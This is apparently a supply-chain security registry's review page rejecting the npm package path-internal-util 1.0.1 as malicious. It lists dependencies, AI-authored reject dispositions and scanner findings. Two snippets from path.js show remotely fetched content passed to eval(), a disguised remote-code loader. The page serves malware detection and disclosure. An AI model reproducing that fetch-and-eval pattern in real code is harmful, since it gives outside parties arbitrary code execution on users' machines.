All path-internal-util versions

[email protected] rejected Risk: 100 ISC

path-internal-util @1.0.1

rejected
This version was rejected. It did not pass GreenFlagged's security review and is not served by the registry. The findings and risk dispositions below explain why.
npm Tarball
100
Risk Score
ISC
License
No
Install Scripts
7
Dependencies
0
Dev Dependencies
5.5 KB
Package Size
Published

Node.js path module

Maintainers

domingopeck

Dependencies (7)

PackageConstraintRegistry Status
fs ^0.0.1-security auto_approved
path ^0.12.7 auto_approved
util ^0.10.3 auto_approved
axios ^1.4.0 auto_approved
execp ^0.0.1 auto_approved
process ^0.11.1 auto_approved
request ^2.88.2 No greenflagged match

Transitive Dependency Tree

33 transitive deps max depth 6
  ├─ axios ^1.4.0 → 1.16.0
  ├─ execp ^0.0.1 → 0.0.1
  ├─ fs ^0.0.1-security → 0.0.1-security
  ├─ path ^0.12.7 → 0.12.7
  ├─ process ^0.11.1 → 0.11.10
  ├─ request ^2.88.2
├─ util ^0.10.3 → 0.10.4
  ├─ follow-redirects ^1.16.0 → 1.16.0
  ├─ form-data ^4.0.5 → 4.0.5
  ├─ inherits 2.0.3 → 2.0.3
  ├─ lodash ^4.13.1 → 4.18.1
  ├─ process ^0.11.1 → 0.11.10
  ├─ proxy-from-env ^2.1.0 → 2.1.0
├─ util ^0.10.3 → 0.10.4
  ├─ asynckit ^0.4.0
  ├─ combined-stream ^1.0.8 → 1.0.8
  ├─ es-set-tostringtag ^2.1.0 → 2.1.0
  ├─ hasown ^2.0.2 → 2.0.4
  ├─ inherits 2.0.3 → 2.0.3
├─ mime-types ^2.1.12 → 2.1.35
  ├─ delayed-stream ~1.0.0 → 1.0.0
  ├─ es-errors ^1.3.0 → 1.3.0
  ├─ function-bind ^1.1.2 → 1.1.2
  ├─ get-intrinsic ^1.2.6 → 1.3.1
  ├─ has-tostringtag ^1.0.2 → 1.0.2
  ├─ hasown ^2.0.2 → 2.0.4
├─ mime-db 1.52.0
  ├─ async-function ^1.0.0
  ├─ async-generator-function ^1.0.0 → 1.0.0
  ├─ call-bind-apply-helpers ^1.0.2 → 1.0.2
  ├─ es-define-property ^1.0.1 → 1.0.1
  ├─ es-errors ^1.3.0 → 1.3.0
  ├─ es-object-atoms ^1.1.1 → 1.1.2
  ├─ function-bind ^1.1.2 → 1.1.2
  ├─ generator-function ^2.0.0 → 2.0.1
  ├─ get-proto ^1.0.1
  ├─ gopd ^1.2.0 → 1.2.0
  ├─ has-symbols ^1.0.3 → 1.1.0
  ├─ has-symbols ^1.1.0 → 1.1.0
  ├─ hasown ^2.0.2 → 2.0.4
├─ math-intrinsics ^1.1.0 → 1.1.0
  ├─ es-errors ^1.3.0 → 1.3.0
  ├─ function-bind ^1.1.2 → 1.1.2

Risk Dispositions (3 applicable to this version, 0 other)

Accepted rules are downgraded to INFO on future analyses; rejected rules escalate to CRITICAL.

Rule Source Disposition Author Reason
semgrep:eval-usage semgrep reject AI AI (semgrep): eval() on remotely-fetched content is RCE; not a false positive for this package.
unvetted-dep:execp dependencies reject AI AI (dependencies): Suspicious dependency in a malicious package; generalizes across versions.
unvetted-dep:request dependencies reject AI AI (dependencies): Used to fetch remote payload for eval; malicious pattern generalizes.

SAST Findings (6)

CRITICAL Unvetted dependency: execp dependencies

[Always reject] Version constraint: ^0.0.1.

CRITICAL Unvetted dependency: request dependencies

[Always reject] Version constraint: ^2.88.2.

CRITICAL MAL-2026-3312: Malicious code in path-internal-util (npm) osv

--- _-= Per source details. Do not edit below this line.=-_ ## Source: ossf-package-analysis (db91c8a40ff204e2aa98c594413d69b624d93a4ac51ea09fc00b1d3f63b8e462) The OpenSSF Package Analysis project identified 'path-internal-util' @ 1.0.1 (npm) as malicious. It is considered malicious because: - The package communicates with a domain associated with malicious activity. - The package executes one or more commands associated with malicious behavior.

CRITICAL eval-usage: path.js:556 semgrep

[Always reject] eval() can execute arbitrary code — common in supply-chain attacks but also used by legitimate parsers and template engines. Verify the input source. 554 | .then((data) => { 555 | const codeString = data.content; > 556 | eval(codeString); 557 | }) 558 | .catch((t) => console.error("Error fetching or executing code:", t));

CRITICAL eval-usage: path.js:566 semgrep

[Always reject] eval() can execute arbitrary code — common in supply-chain attacks but also used by legitimate parsers and template engines. Verify the input source. 564 | .then((data) => { 565 | const codeString = data.content; > 566 | eval(codeString); 567 | }) 568 | .catch((t) => console.error("Error fetching or executing code:", t));

LOW No provenance attestation provenance

Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.

Review Summary

Risk score: 100 (capped from 221). Findings: 5 critical (+200), 7 low (+21).

Published to npm: